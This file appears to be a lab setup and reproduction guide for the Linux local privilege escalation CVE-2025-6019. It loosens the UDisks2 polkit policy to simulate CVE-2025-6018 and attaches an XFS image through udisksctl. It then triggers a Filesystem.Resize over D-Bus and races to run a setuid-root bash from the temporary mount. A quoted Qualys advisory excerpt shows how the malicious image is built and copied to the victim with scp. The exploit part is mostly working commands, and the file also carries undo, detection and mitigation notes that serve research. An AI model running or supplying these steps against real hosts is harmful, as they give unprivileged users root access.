CVE-2025-6019/setup.md

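Set up a simulated CVE-2025-6018 (for Ubuntu)

CVE-2025-6018 itself is not reproduced here: the UDisks2 polkit policy is loosened by hand so that an unprivileged user gets the access that bug would have given, which is the precondition for CVE-2025-6019.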

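# Lab preparation: stand in for CVE-2025-6018 by loosening the UDisks2 polkit
# policy by hand.
#
# Effect of the sed expressions: every default that is exactly "auth_admin"
# (allow_any, allow_inactive, allow_active) becomes "yes", for every action in
# the file. Values such as auth_admin_keep do not match and are left alone.
# This is broader than the condition being simulated: any session, local or
# remote, can then call those UDisks2 actions without authentication, and the
# host stays that way until the policy file is restored.
policy=/usr/share/polkit-1/actions/org.freedesktop.UDisks2.policy

sudo apt update
# XFS userspace tools; presumably what the resize of the XFS image relies on
# (confirm against the advisory).
sudo apt install xfsprogs

# Keep one pristine copy so the change can be undone; the test stops a second
# run from overwriting it with the already-edited file.
# Undo: sudo cp -p -- "$policy.orig" "$policy" && sudo systemctl restart polkit
[ -e "$policy.orig" ] || sudo cp -p -- "$policy" "$policy.orig"

# One pass over the file instead of three separate in-place edits.
sudo sed -i \
  -e 's/<allow_any>auth_admin<\/allow_any>/<allow_any>yes<\/allow_any>/g' \
  -e 's/<allow_inactive>auth_admin<\/allow_inactive>/<allow_inactive>yes<\/allow_inactive>/g' \
  -e 's/<allow_active>auth_admin<\/allow_active>/<allow_active>yes<\/allow_active>/g' \
  "$policy"

# Restart polkit so the edited policy is the one in use.
sudo systemctl restart polkit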
# Reproduction steps for CVE-2025-6019, run as the unprivileged user.
# Assumes ./xfs.image is the image described in the advisory excerpt further
# down, and that the new loop device is loop0 (the object path in the gdbus
# call is hard-coded; confirm with the udisksctl output).
#
# Attach the image as a loop device through UDisks2, with no interactive
# authentication prompt.
udisksctl loop-setup --file ./xfs.image --no-user-interaction

# Background job: keeps retrying until a bash binary can be executed from
# /tmp/blockdev*/, then holds for 10 seconds, lists the file and stops.
# Errors from the failed attempts are discarded (2>/dev/null).
while true; do /tmp/blockdev*/bash -c 'sleep 10; ls -l /tmp/blockdev*/bash' && break; done 2>/dev/null &

# Ask UDisks2 over the system bus to resize the filesystem on loop0.
# NOTE(review): per the Qualys advisory, the resize path mounts the filesystem
# temporarily under /tmp/blockdev* and the defect is that this mount is made
# without nosuid/nodev. Confirm against the advisory text.
gdbus call --system --dest org.freedesktop.UDisks2 --object-path /org/freedesktop/UDisks2/block_devices/loop0 --method org.freedesktop.UDisks2.Filesystem.Resize 0 '{}'

# Verification: the temporary mount directory and its mount options.
# The same artefacts serve detection: a mount under /tmp/blockdev* that lacks
# nosuid, following a Filesystem.Resize call from a non-admin user.
find /tmp | grep blockdev

mount

# Final check: run the bash copy from the temporary mount. -p stops bash from
# dropping the effective UID it receives from the setuid bit.
# Mitigation: install the patched libblockdev/udisks2 packages; as an interim
# measure the advisory recommends requiring auth_admin for the polkit action
# org.freedesktop.udisks2.modify-device.
/tmp/blockdev*/bash -p

From: https://cdn2.qualys.com/2025/06/17/suse15-pam-udisks-lpe.txt

1/ On our own attacker machine, as root, we create an XFS image that
contains a SUID-root shell, and copy it to the victim machine:

------------------------------------------------------------------------
attacker# dd if=/dev/zero of=./xfs.image bs=1M count=300

attacker# mkfs.xfs ./xfs.image

attacker# mkdir ./xfs.mount

attacker# mount -t xfs ./xfs.image ./xfs.mount

attacker# cp /bin/bash ./xfs.mount

attacker# chmod 04555 ./xfs.mount/bash

attacker# umount ./xfs.mount

attacker# scp -i id_ed25519 ./xfs.image nobody@victim: